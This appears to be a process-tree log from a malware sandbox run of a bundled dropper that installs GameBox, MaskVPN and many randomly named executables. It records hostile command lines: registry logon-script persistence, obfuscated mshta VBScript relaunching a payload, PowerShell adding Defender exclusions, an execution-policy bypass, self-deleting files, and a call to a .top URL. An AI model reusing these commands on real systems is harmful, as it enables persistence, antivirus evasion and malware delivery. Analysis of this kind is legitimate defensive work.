"C:\Users\Admin\AppData\Local\Temp\is-E09QL.tmp\Setup.tmp" /SL5="$50218,17356095,721408,C:\Users\Admin\AppData\Local\Temp\is-J7NJ2.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
8⤵
PID:1424

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-V7V8Q.tmp\{app}\microsoft.cab -F:* %ProgramData%
9⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:4228

C:\Windows\SysWOW64\expand.exe
expand C:\Users\Admin\AppData\Local\Temp\is-V7V8Q.tmp\{app}\microsoft.cab -F:* C:\ProgramData
10⤵
PID:8268

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
9⤵
PID:9704

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
10⤵
PID:9924

C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
9⤵
PID:5652

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
9⤵
PID:10540

C:\Users\Admin\AppData\Local\Temp\is-V7V8Q.tmp\{app}\vdi_compiler.exe
"C:\Users\Admin\AppData\Local\Temp\is-V7V8Q.tmp\{app}\vdi_compiler"
9⤵
PID:10672

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-V7V8Q.tmp\{app}\vdi_compiler.exe"
10⤵
PID:5216

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 4
11⤵
- Runs ping.exe
PID:2044

C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
5⤵
PID:5356

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5356 -s 756
6⤵
- Program crash
PID:1544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5356 -s 808
6⤵
- Program crash
PID:7344

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5356 -s 820
6⤵
- Program crash
PID:7096

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5356 -s 960
6⤵
- Program crash
PID:7792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5356 -s 988
6⤵
- Program crash
PID:7432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5356 -s 1044
6⤵
- Program crash
PID:7608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5356 -s 1340
6⤵
- Program crash
PID:6804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5356 -s 1284
6⤵
- Program crash
PID:6784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5356 -s 1404
6⤵
- Program crash
PID:9108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5356 -s 1356
6⤵
- Program crash
PID:8516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5356 -s 1572
6⤵
- Program crash
PID:6096

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5356 -s 1616
6⤵
- Program crash
PID:2288

C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
5⤵
PID:5568

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629579446 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
6⤵
PID:7364

C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
5⤵
PID:5592

C:\Users\Admin\AppData\Local\Temp\is-SULSU.tmp\WEATHER Manager.tmp
"C:\Users\Admin\AppData\Local\Temp\is-SULSU.tmp\WEATHER Manager.tmp" /SL5="$202FC,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
6⤵
PID:4916

C:\Users\Admin\AppData\Local\Temp\is-H2DAM.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-H2DAM.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
7⤵
PID:2656

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-H2DAM.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-H2DAM.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629579446 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
8⤵
PID:1196

C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
5⤵
PID:5644

C:\Users\Admin\AppData\Local\Temp\is-926O1.tmp\VPN.tmp
"C:\Users\Admin\AppData\Local\Temp\is-926O1.tmp\VPN.tmp" /SL5="$2025C,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
6⤵
PID:5740

C:\Users\Admin\AppData\Local\Temp\is-BPK98.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-BPK98.tmp\Setup.exe" /silent /subid=720
7⤵
PID:4848

C:\Users\Admin\AppData\Local\Temp\is-8GCSB.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8GCSB.tmp\Setup.tmp" /SL5="$3025A,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-BPK98.tmp\Setup.exe" /silent /subid=720
8⤵
PID:7256

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
9⤵
PID:7760

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
10⤵
PID:5488

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
9⤵
PID:5984

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
10⤵
PID:6028

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
9⤵
PID:8652

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
9⤵
PID:7692

C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
5⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:4256

C:\Users\Admin\AppData\Roaming\8251980.exe
"C:\Users\Admin\AppData\Roaming\8251980.exe"
6⤵
PID:7356

C:\Users\Admin\AppData\Roaming\6500212.exe
"C:\Users\Admin\AppData\Roaming\6500212.exe"
6⤵
PID:7452

C:\Users\Admin\AppData\Roaming\6474422.exe
"C:\Users\Admin\AppData\Roaming\6474422.exe"
6⤵
PID:7680

C:\Users\Admin\AppData\Roaming\4494234.exe
"C:\Users\Admin\AppData\Roaming\4494234.exe"
6⤵
PID:7668

C:\Users\Admin\AppData\Roaming\2792351.exe
"C:\Users\Admin\AppData\Roaming\2792351.exe"
6⤵
PID:7420

C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
5⤵
PID:5684

C:\Users\Admin\AppData\Local\Temp\is-NERC2.tmp\MediaBurner2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-NERC2.tmp\MediaBurner2.tmp" /SL5="$30388,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
6⤵
PID:5728

C:\Users\Admin\AppData\Local\Temp\is-BFGPH.tmp\ultradumnibour.exe
"C:\Users\Admin\AppData\Local\Temp\is-BFGPH.tmp\ultradumnibour.exe" /S /UID=burnerch2
7⤵
PID:5748

C:\Program Files\Uninstall Information\RKOQIGLMAK\ultramediaburner.exe
"C:\Program Files\Uninstall Information\RKOQIGLMAK\ultramediaburner.exe" /VERYSILENT
8⤵
PID:8164

C:\Users\Admin\AppData\Local\Temp\is-UMLOD.tmp\ultramediaburner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-UMLOD.tmp\ultramediaburner.tmp" /SL5="$402E6,281924,62464,C:\Program Files\Uninstall Information\RKOQIGLMAK\ultramediaburner.exe" /VERYSILENT
9⤵
PID:5640

C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
10⤵
PID:8384

C:\Users\Admin\AppData\Local\Temp\c6-b4f2c-bfe-bdc85-f3fd07f893afc\Fusilynoshae.exe
"C:\Users\Admin\AppData\Local\Temp\c6-b4f2c-bfe-bdc85-f3fd07f893afc\Fusilynoshae.exe"
8⤵
PID:8204

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
dw20.exe -x -s 2356
9⤵
PID:9184

C:\Users\Admin\AppData\Local\Temp\de-0861a-b9b-b6ab2-726491205c125\Rupanepapi.exe
"C:\Users\Admin\AppData\Local\Temp\de-0861a-b9b-b6ab2-726491205c125\Rupanepapi.exe"
8⤵
PID:8328

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hsf3zxew.vkb\GcleanerEU.exe /eufive & exit
9⤵
PID:8920

C:\Users\Admin\AppData\Local\Temp\hsf3zxew.vkb\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\hsf3zxew.vkb\GcleanerEU.exe /eufive
10⤵
PID:684

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\hsf3zxew.vkb\GcleanerEU.exe" & exit
11⤵
PID:9504

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "GcleanerEU.exe" /f
12⤵
- Kills process with taskkill
PID:10236

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pam4xhd4.o43\installer.exe /qn CAMPAIGN="654" & exit
9⤵
PID:6248

C:\Users\Admin\AppData\Local\Temp\pam4xhd4.o43\installer.exe
C:\Users\Admin\AppData\Local\Temp\pam4xhd4.o43\installer.exe /qn CAMPAIGN="654"
10⤵
PID:5400

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hbeczcrp.nrq\anyname.exe & exit
9⤵
PID:4524

C:\Users\Admin\AppData\Local\Temp\hbeczcrp.nrq\anyname.exe
C:\Users\Admin\AppData\Local\Temp\hbeczcrp.nrq\anyname.exe
10⤵
PID:7500

C:\Users\Admin\AppData\Local\Temp\hbeczcrp.nrq\anyname.exe
"C:\Users\Admin\AppData\Local\Temp\hbeczcrp.nrq\anyname.exe" -q
11⤵
PID:3396

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1cu1o3pk.duy\gcleaner.exe /mixfive & exit
9⤵
PID:3572

C:\Users\Admin\AppData\Local\Temp\1cu1o3pk.duy\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\1cu1o3pk.duy\gcleaner.exe /mixfive
10⤵
PID:9336

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1cu1o3pk.duy\gcleaner.exe" & exit
11⤵
PID:6660

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "gcleaner.exe" /f
12⤵
- Kills process with taskkill
PID:8424

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\obhp2k42.k02\autosubplayer.exe /S & exit
9⤵
PID:8072

C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
5⤵
PID:5632

C:\Users\Admin\Documents\htEOty9YwE0p7exdulN8d2kd.exe
"C:\Users\Admin\Documents\htEOty9YwE0p7exdulN8d2kd.exe"
6⤵
PID:6200

C:\Users\Admin\Documents\CG1KlhtGQOXCaGWAbD8r3Hqb.exe
"C:\Users\Admin\Documents\CG1KlhtGQOXCaGWAbD8r3Hqb.exe"
6⤵
PID:6340

C:\Users\Admin\Documents\CG1KlhtGQOXCaGWAbD8r3Hqb.exe
"C:\Users\Admin\Documents\CG1KlhtGQOXCaGWAbD8r3Hqb.exe"
7⤵
PID:4192

C:\Users\Admin\Documents\SzpBEf1LClKuTUOD2Fznu0FW.exe
"C:\Users\Admin\Documents\SzpBEf1LClKuTUOD2Fznu0FW.exe"
6⤵
PID:6400

C:\Users\Admin\Documents\SzpBEf1LClKuTUOD2Fznu0FW.exe
C:\Users\Admin\Documents\SzpBEf1LClKuTUOD2Fznu0FW.exe
7⤵
PID:6876

C:\Users\Admin\Documents\FuTeK4xijPxArPqnEcHP3gvv.exe
"C:\Users\Admin\Documents\FuTeK4xijPxArPqnEcHP3gvv.exe"
6⤵
PID:6392

C:\Users\Admin\AppData\Roaming\3371692.exe
"C:\Users\Admin\AppData\Roaming\3371692.exe"
7⤵
PID:5596

C:\Users\Admin\AppData\Roaming\3293071.exe
"C:\Users\Admin\AppData\Roaming\3293071.exe"
7⤵
PID:5336

C:\Users\Admin\AppData\Roaming\2011151.exe
"C:\Users\Admin\AppData\Roaming\2011151.exe"
7⤵
PID:8044

C:\Users\Admin\AppData\Roaming\2569013.exe
"C:\Users\Admin\AppData\Roaming\2569013.exe"
7⤵
PID:388

C:\Users\Admin\Documents\yjzIgZk_0JYOSSMak6543lP2.exe
"C:\Users\Admin\Documents\yjzIgZk_0JYOSSMak6543lP2.exe"
6⤵
PID:6416

C:\Users\Admin\Documents\UNI4zNq4wCodBsiH3MXtt8hs.exe
"C:\Users\Admin\Documents\UNI4zNq4wCodBsiH3MXtt8hs.exe"
6⤵
PID:6332

C:\Users\Admin\Documents\5UoU7ov7sysFbKLm6GGXD_yE.exe
"C:\Users\Admin\Documents\5UoU7ov7sysFbKLm6GGXD_yE.exe"
6⤵
PID:6324

C:\Users\Admin\Documents\Z6VkuePfSPANNGVqGpmhS_ev.exe
"C:\Users\Admin\Documents\Z6VkuePfSPANNGVqGpmhS_ev.exe"
6⤵
PID:6316

C:\Users\Admin\Documents\Z6VkuePfSPANNGVqGpmhS_ev.exe
C:\Users\Admin\Documents\Z6VkuePfSPANNGVqGpmhS_ev.exe
7⤵
PID:6676

C:\Users\Admin\Documents\0NBtpueWgg8rlwg2IvxZYglV.exe
"C:\Users\Admin\Documents\0NBtpueWgg8rlwg2IvxZYglV.exe"
6⤵
PID:6308

C:\Users\Admin\Documents\_ZwxI36u8VdqpVmZT9_dbVWi.exe
"C:\Users\Admin\Documents\_ZwxI36u8VdqpVmZT9_dbVWi.exe"
6⤵
PID:6616

C:\Users\Admin\Documents\8WaJfGpDfFvIhvMuZKnmp1sN.exe
"C:\Users\Admin\Documents\8WaJfGpDfFvIhvMuZKnmp1sN.exe"
6⤵
PID:6568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 664
7⤵
- Program crash
PID:7632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 676
7⤵
- Program crash
PID:7572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 720
7⤵
- Program crash
PID:6260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 724
7⤵
- Program crash
PID:7088

C:\Users\Admin\Documents\bxSKPmiBLcPe3QL6_uvXKpU8.exe
"C:\Users\Admin\Documents\bxSKPmiBLcPe3QL6_uvXKpU8.exe"
6⤵
PID:6776

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "bxSKPmiBLcPe3QL6_uvXKpU8.exe" /f & erase "C:\Users\Admin\Documents\bxSKPmiBLcPe3QL6_uvXKpU8.exe" & exit
7⤵
PID:9072

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "bxSKPmiBLcPe3QL6_uvXKpU8.exe" /f
8⤵
- Kills process with taskkill
PID:6624

C:\Users\Admin\Documents\6CoZYr0lZOFMDF0YDXHDeuc1.exe
"C:\Users\Admin\Documents\6CoZYr0lZOFMDF0YDXHDeuc1.exe"
6⤵
PID:6832

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbSCRipt:ClOSe( creATEoBJEcT("WscRIpT.sHEll" ).RUN("Cmd /Q /C tYPe ""C:\Users\Admin\Documents\6CoZYr0lZOFMDF0YDXHDeuc1.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\6CoZYr0lZOFMDF0YDXHDeuc1.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 ,TRUE ) )
7⤵
PID:5548

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\6CoZYr0lZOFMDF0YDXHDeuc1.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""=="" for %W iN ( "C:\Users\Admin\Documents\6CoZYr0lZOFMDF0YDXHDeuc1.exe") do taskkill -IM "%~nXW" -f
8⤵
PID:3232

C:\Windows\SysWOW64\taskkill.exe
taskkill -IM "6CoZYr0lZOFMDF0YDXHDeuc1.exe" -f
9⤵
- Kills process with taskkill
PID:5536

C:\Users\Admin\Documents\F4Z4wBh0ORqcuM9lHFcBIFq2.exe
"C:\Users\Admin\Documents\F4Z4wBh0ORqcuM9lHFcBIFq2.exe"
6⤵
PID:6888

C:\Users\Admin\Documents\LO4AwBTH7jF9K2Ig7khOHCGV.exe
"C:\Users\Admin\Documents\LO4AwBTH7jF9K2Ig7khOHCGV.exe"
6⤵
PID:6712

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "LO4AwBTH7jF9K2Ig7khOHCGV.exe" /f & erase "C:\Users\Admin\Documents\LO4AwBTH7jF9K2Ig7khOHCGV.exe" & exit
7⤵
PID:4508

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "LO4AwBTH7jF9K2Ig7khOHCGV.exe" /f
8⤵
- Kills process with taskkill
PID:5048

C:\Users\Admin\Documents\Rl7HOzKegW1Vj2LCxFJCEqGj.exe
"C:\Users\Admin\Documents\Rl7HOzKegW1Vj2LCxFJCEqGj.exe"
6⤵
PID:6704

C:\Users\Admin\Documents\Rl7HOzKegW1Vj2LCxFJCEqGj.exe
"C:\Users\Admin\Documents\Rl7HOzKegW1Vj2LCxFJCEqGj.exe"
7⤵
PID:8100

C:\Users\Admin\Documents\qpzkGGuOBrjZb5PWRo3HnEAz.exe
"C:\Users\Admin\Documents\qpzkGGuOBrjZb5PWRo3HnEAz.exe"
6⤵
PID:7060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7060 -s 760
7⤵
- Program crash
PID:6036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7060 -s 812
7⤵
- Program crash
PID:6652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7060 -s 792
7⤵
- Program crash
PID:6300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7060 -s 824
7⤵
- Program crash
PID:6132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7060 -s 1060
7⤵
- Program crash
PID:8588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7060 -s 1476
7⤵
- Program crash
PID:8824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7060 -s 1636
7⤵
- Program crash
PID:8716

C:\Users\Admin\Documents\o19lZiYeWGvykP0vx74LJqKo.exe
"C:\Users\Admin\Documents\o19lZiYeWGvykP0vx74LJqKo.exe"
6⤵
PID:7108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 388
7⤵
- Program crash
PID:6416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 368
7⤵
- Program crash
PID:6804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 432
7⤵
- Program crash
PID:8464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 604
7⤵
- Program crash
PID:8880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 676
7⤵
- Program crash
PID:9200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 704
7⤵
- Program crash
PID:6464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 656
7⤵
- Program crash
PID:8644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 748
7⤵
- Program crash
PID:8588

C:\Users\Admin\Documents\o19lZiYeWGvykP0vx74LJqKo.exe
"C:\Users\Admin\Documents\o19lZiYeWGvykP0vx74LJqKo.exe"
7⤵
PID:7428

C:\Users\Admin\Documents\88D4xZrOtukLL_JuCgdzlY7g.exe
"C:\Users\Admin\Documents\88D4xZrOtukLL_JuCgdzlY7g.exe"
6⤵
PID:7156

C:\Users\Admin\Documents\NdF0xoCnuDEDkXGrIUIywZHC.exe
"C:\Users\Admin\Documents\NdF0xoCnuDEDkXGrIUIywZHC.exe"
6⤵
PID:1732

C:\Users\Admin\Documents\rCn2Ov7NGMfdfOCu6h8Y42rw.exe
"C:\Users\Admin\Documents\rCn2Ov7NGMfdfOCu6h8Y42rw.exe"
6⤵
PID:6924

C:\Users\Admin\Documents\BjuqjRCHntK9TAzH59Nb246b.exe
"C:\Users\Admin\Documents\BjuqjRCHntK9TAzH59Nb246b.exe"
6⤵
PID:5440

C:\Users\Admin\Documents\dbykF7SzhESvnh856zsqNToD.exe
"C:\Users\Admin\Documents\dbykF7SzhESvnh856zsqNToD.exe"
6⤵
PID:4204

C:\Users\Admin\Documents\dbykF7SzhESvnh856zsqNToD.exe
"C:\Users\Admin\Documents\dbykF7SzhESvnh856zsqNToD.exe" -q
7⤵
PID:7984

C:\Users\Admin\Documents\wiZ0Opw6FEa_dXrzFkKy96IL.exe
"C:\Users\Admin\Documents\wiZ0Opw6FEa_dXrzFkKy96IL.exe"
6⤵
PID:6660

C:\Users\Admin\AppData\Local\Temp\is-MEA1V.tmp\wiZ0Opw6FEa_dXrzFkKy96IL.tmp
"C:\Users\Admin\AppData\Local\Temp\is-MEA1V.tmp\wiZ0Opw6FEa_dXrzFkKy96IL.tmp" /SL5="$10584,138429,56832,C:\Users\Admin\Documents\wiZ0Opw6FEa_dXrzFkKy96IL.exe"
7⤵
PID:6264

C:\Users\Admin\AppData\Local\Temp\is-5HA6T.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-5HA6T.tmp\Setup.exe" /Verysilent
8⤵
PID:2728

C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
9⤵
PID:748

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629579446 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
10⤵
PID:4896

C:\Users\Admin\Documents\T6MpZXXHuoTKgSotg7DAi09W.exe
"C:\Users\Admin\Documents\T6MpZXXHuoTKgSotg7DAi09W.exe"
6⤵
PID:5164

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\T6MPZX~1.DLL,s C:\Users\Admin\DOCUME~1\T6MPZX~1.EXE
7⤵
PID:9320

C:\Windows\SysWOW64\RUNDLL32.EXE
C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\T6MPZX~1.DLL,MAIuS1NNSzE3
8⤵
PID:4732

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\T6MPZX~1.DLL
9⤵
PID:10656

C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
5⤵
PID:5976

C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
6⤵
PID:3744

C:\Users\Admin\Documents\oeAHcI58P5hXFE5b9fwcXmMF.exe
"C:\Users\Admin\Documents\oeAHcI58P5hXFE5b9fwcXmMF.exe"
2⤵
- Executes dropped EXE
PID:4528

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\OEAHCI~1.DLL,s C:\Users\Admin\DOCUME~1\OEAHCI~1.EXE
3⤵
PID:6644

C:\Windows\SysWOW64\RUNDLL32.EXE
C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\OEAHCI~1.DLL,VjwaOGE=
4⤵
PID:9324

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\OEAHCI~1.DLL
5⤵
PID:9088

C:\Windows\SysWOW64\RUNDLL32.EXE
C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\OEAHCI~1.DLL,WAFWR2hyck0=
5⤵
PID:9420

C:\Windows\system32\rundll32.exe
C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 31804
6⤵
PID:7984

C:\Windows\system32\ctfmon.exe
ctfmon.exe
7⤵
PID:2296

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp7D8A.tmp.ps1"
5⤵
PID:5592

C:\Users\Admin\Documents\AOrVfqejFU4lQIMMYFfynLWS.exe
"C:\Users\Admin\Documents\AOrVfqejFU4lQIMMYFfynLWS.exe"
2⤵
- Executes dropped EXE
PID:972

C:\Windows\SysWOW64\mshta.exe
